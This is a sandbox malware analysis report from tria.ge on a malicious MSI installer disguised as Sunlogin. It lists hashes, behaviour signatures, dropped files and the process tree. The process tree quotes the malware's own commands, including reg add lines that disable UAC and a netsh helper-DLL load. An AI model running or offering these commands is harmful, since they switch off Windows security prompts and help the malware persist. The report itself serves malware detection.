Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    121s
  • max time network
    124s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    21/11/2024, 02:40

General

  • Target

    c440d1721cb83183eb397171531888556f544659e1640bf974ed55548016ed3c.msi

  • Size

    106.0MB

  • MD5

    13efd06a23bfa0e958907db33d947ff9

  • SHA1

    57b60766072b7037ca5c5d31a23dd57e332421b8

  • SHA256

    c440d1721cb83183eb397171531888556f544659e1640bf974ed55548016ed3c

  • SHA512

    b2a914c5359a636003d3dc45b8be36a8e059f40893f171a845969ab5a791310f6a86337205f775a0ca0807ddc8a6fcf294a6cf64c990ae58bd2466b1954bb3e0

  • SSDEEP

    3145728:8Cc6i9DJclUWcTsPsz+gpvp0lHEavPwsJ+KkKELYfFY:+rDJciusz+gNpUkGP/J+xEfFY

Malware Config

Signatures

  • UAC bypass 3 TTPs 3 IoCs
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 13 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 10 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 23 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 38 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\c440d1721cb83183eb397171531888556f544659e1640bf974ed55548016ed3c.msi
    1⤵
    • Enumerates connected drives
    • Event Triggered Execution: Installer Packages
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:1968
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Loads dropped DLL
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1936
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding E9D78674C053B69FDFDBADF5D9D0716E
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      PID:2488
    • C:\Program Files\Sunlogin\Sunlogin\XR.exe
      "C:\Program Files\Sunlogin\Sunlogin\XR.exe"
      2⤵
      • Executes dropped EXE
      • Modifies data under HKEY_USERS
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:300
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ipconfig /all
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:284
        • C:\Windows\system32\ipconfig.exe
          ipconfig /all
          4⤵
          • Gathers network information
          PID:2980
      • C:\Windows\System32\netsh.exe
        "C:\Windows\System32\netsh.exe" -f C:\Users\Public\Pictures\Ilp7p.xml
        3⤵
        • Event Triggered Execution: Netsh Helper DLL
        • Modifies data under HKEY_USERS
        PID:632
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Roaming\7EUMU.bat"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1288
        • C:\Windows\system32\reg.exe
          reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t reg_dword /d 0 /F
          4⤵
          • UAC bypass
          PID:328
        • C:\Windows\system32\reg.exe
          reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t reg_dword /d 0 /F
          4⤵
          • UAC bypass
          PID:928
        • C:\Windows\system32\reg.exe
          reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v PromptOnSecureDesktop /t reg_dword /d 0 /F
          4⤵
          • UAC bypass
          PID:1852
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c copy /b C:\Users\Public\Pictures\KAdWo\d867R~18\p+C:\Users\Public\Pictures\KAdWo\d867R~18\w C:\Users\Public\Pictures\KAdWo\d867R~18\nw_elf.dll
        3⤵
          PID:2036
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2948
    • C:\Windows\system32\DrvInst.exe
      DrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19" "" "" "61530dda3" "0000000000000000" "00000000000003E8" "00000000000004A0"
      1⤵
      • Drops file in Windows directory
      • Modifies data under HKEY_USERS
      • Suspicious use of AdjustPrivilegeToken
      PID:1716
    • C:\Windows\system32\mmc.exe
      C:\Windows\system32\mmc.exe -Embedding
      1⤵
      • Modifies data under HKEY_USERS
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2336
      • C:\Users\Public\Pictures\KAdWo\d867R~18\jdy_client_mini.exe
        "C:\Users\Public\Pictures\KAdWo\d867R~18\jdy_client_mini.exe"
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        PID:896

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Config.Msi\f76cdaf.rbs

      Filesize

      8KB

      MD5

      749145467efdf90f8e02249981a7bc2b

      SHA1

      6abfee2dea69804e000d922c0762d3d119de745b

      SHA256

      826dc2fc45a2017b9adbdd7152c7c4279ebe272f0b909d5a4400e974c7ff1b54

      SHA512

      ffa95d4f6a96f1a93ed6b989a79194dc7e3e3c05a3eb71f0a1f06c7bec87e310c17797edad49f83357d27efdc2d58a482a510b1f34f7603f790a24959e5ddaf8

    • C:\Program Files\Sunlogin\Sunlogin\cache_21_0

      Filesize

      9.0MB

      MD5

      be5628882d28ba1bdb9850dc4b7e7fa1

      SHA1

      6d37839c4b8ded05c0e8108696e1b794de59a2a8

      SHA256

      def949e97a2a2d2e504f7c85a27a6f2fd44d3a898357398f4aaa7eb033dfb287

      SHA512

      16037fd6ee2bb26e1014e9e69a2ee5d7290ebe5021ed1eedaa5908b73c39cc2ba6f66c553be9a39163b8831e8f519b10009e71fb94ce392c7229541192aa1c39

    • C:\Users\Admin\AppData\Roaming\7EUMU.bat

      Filesize

      392B

      MD5

      30d6eb22d6aeec10347239b17b023bf4

      SHA1

      e2a6f86d66c699f6e0ff1ac4e140af4a2a4637d1

      SHA256

      659df6b190a0b92fc34e3a4457b4a8d11a26a4caf55de64dfe79eb1276181f08

      SHA512

      500872c3f2f3f801ec51717690873194675cb7f32cc4a862c09d90c18638d364d49b0e04c32323f52734e5c806e3503a63ac755c7019d762786a72840123df76

    • C:\Users\Public\Pictures\KAdWo\d867R~18\NH.txt

      Filesize

      179KB

      MD5

      1bd1c65b610003b945e7b9bd7210db2a

      SHA1

      66902e2b5d575c0232eab4576b81daac56a6bbc8

      SHA256

      871814884dd4058d25cc0111fea5bf48da43d7ac6e7b71db166dd3190a116820

      SHA512

      d487bd2beab4e9c44ebbcffab0215b1c2d93ae3feea8130f8cbcafb4b182222e6054c3c7f79c77a6004a67890f3d5e8cc3a39d959c5b3c40249752483ef00928

    • C:\Users\Public\Pictures\KAdWo\d867R~18\jdy_client_mini.exe

      Filesize

      2.6MB

      MD5

      c206388d7a4c81a52cf637a3e0d2acc8

      SHA1

      c927b021d7f4691ac84a7a54a8d3358f02c89ee6

      SHA256

      1dab81c0d0650a673151e90d475722906f6d71421ceaa8f0df9b14d2e36cd9d3

      SHA512

      247d2277b23360db7d9e7794be80290e1148eb03d5b15ef56710c5dfd62b0374cc05a1529889f00f59813a4e1ed00f35358069a3397fafd65f89205268e4f783

    • C:\Users\Public\Pictures\KAdWo\d867R~18\nw_elf.dll

      Filesize

      1.7MB

      MD5

      c17a7b1c4836089c0c73b03b8ada5941

      SHA1

      25629c7994565d12969b36f9b3960bafedd7e20a

      SHA256

      0ef6821b9df8c45c7d817c36bf99cf0057a63bcb5709ffdfd721cc50dcd7afd9

      SHA512

      0b6510127be3014b0b46ed7f4fb48b75bf63b566ae700767115d0e6d26d8e487d0261b19952dc9c0d9946e25d424388b41c7b2f9634c8ff008d9d837de335597

    • C:\Users\Public\Pictures\KAdWo\d867R~18\p

      Filesize

      886KB

      MD5

      2ed406d06efeeea53ba02a605f1d1674

      SHA1

      70085132cb0207b1389581489149c42052ba374b

      SHA256

      7bdd4e0d14aae0653f703b66b8257f6a9c997547d06fb20063cc02929b7cd1b0

      SHA512

      0213c75c9611102a12ccc26e44fffdc7657606da00a6aa98044394a845dbaa25d1e1f987c5963c7db96f965804db29032cd480d15732cbb33a622ba7dc387762

    • C:\Users\Public\Pictures\KAdWo\d867R~18\w

      Filesize

      886KB

      MD5

      a5b68f44e99929a11b6fead500e8ed61

      SHA1

      6dcd1d94e214a3db96c286758c0e2690dddaa977

      SHA256

      fdf58cf91573dfebe3ea25d567b993570ebd5a2f2fd74fd1e22dcd7103ac18b2

      SHA512

      af8c057851ec682047d550d7190d7450f505b848f87aaf6681400acc9a21253321b06de74d7d932cfc1a7a153bc3d13d791c42b365159ae51184c8ec86f201e9

    • C:\Windows\Installer\MSICE18.tmp

      Filesize

      557KB

      MD5

      db7612f0fd6408d664185cfc81bef0cb

      SHA1

      19a6334ec00365b4f4e57d387ed885b32aa7c9aa

      SHA256

      e9e426b679b3efb233f03c696e997e2da3402f16a321e954b54454317fceb240

      SHA512

      25e129cb22aaabc68c42ecf10bb650ac4d0609b12c08703c780572bac7ecf4559fcc49cd595c56ea48cf55260a984cfa333c08307ffb7c62268b03fbecc724b9

    • \Program Files\Sunlogin\Sunlogin\XR.exe

      Filesize

      18.7MB

      MD5

      8fb8044052662077cdc327a12000e3e9

      SHA1

      94a421e07d154fcc6d411d72f7aa9c3f08bd8058

      SHA256

      ef413c1fdf376dbac6bde73240146ea2676ed47d08150f8b744576f4d3bc4dd2

      SHA512

      2258250b048b61a9732b0da0ef2fb4b522158718a6ab6dcba4dc9b545e3954aa93926d033111c4e14cf85c30f7fa236c0453d9cd70a06c6d06e1d6dc197373e3

    • memory/300-53-0x0000000180000000-0x0000000180213000-memory.dmp

      Filesize

      2.1MB

    • memory/300-52-0x0000000180000000-0x0000000180213000-memory.dmp

      Filesize

      2.1MB

    • memory/300-51-0x0000000180000000-0x0000000180213000-memory.dmp

      Filesize

      2.1MB

    • memory/896-70-0x0000000000250000-0x00000000002B9000-memory.dmp

      Filesize

      420KB

    • memory/1936-64-0x000000013F120000-0x000000013F130000-memory.dmp

      Filesize

      64KB

    • memory/1936-37-0x000000013F120000-0x000000013F130000-memory.dmp

      Filesize

      64KB